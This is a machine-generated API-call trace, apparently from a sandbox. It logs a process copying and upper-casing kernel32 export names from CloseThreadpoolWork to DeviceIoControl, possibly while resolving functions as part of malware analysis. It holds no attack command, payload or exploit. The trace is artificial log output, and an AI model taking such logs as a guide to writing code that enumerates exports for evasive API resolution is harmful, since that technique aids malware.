[0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.419] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.419] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.419] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.419] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.419] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.419] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.419] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.419] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.420] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.420] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.420] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.420] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.420] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.420] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.420] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.420] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.420] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.420] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.420] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.420] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.420] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.420] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.420] lstrlenA (lpString="COPYFILEA") returned 9 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.420] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.420] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.420] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.421] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.421] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.421] lstrlenA (lpString="COPYFILEW") returned 9 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.421] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.421] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.421] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.421] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.421] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.421] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.421] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.421] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.421] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.421] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.421] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.421] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.421] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.421] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.421] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.421] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.422] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.422] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.422] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.422] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.422] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.422] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.422] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.422] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.422] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.422] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.422] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.422] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.422] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.422] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.422] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.422] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.422] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.422] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.422] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.423] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.423] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.423] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.423] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.423] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.423] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.423] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.423] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.423] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.423] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.423] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.423] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.423] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.423] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.423] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.423] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.423] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.423] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.423] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.423] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.424] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.424] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.424] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.424] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.424] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.424] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.424] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.424] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.424] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.424] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.424] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.424] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.424] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.424] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.424] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.424] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.424] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.424] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.425] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.425] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.425] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.425] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.425] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.425] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.425] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.425] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.425] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.425] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.426] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.426] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.426] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.426] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.426] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.426] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.426] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.426] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.426] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.426] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.426] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.426] lstrlenA (lpString="DELETEATOM") returned 10 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.426] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.426] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.426] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.426] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.426] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.426] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.427] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.427] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.427] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.427] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.427] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.427] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.427] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.427] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" 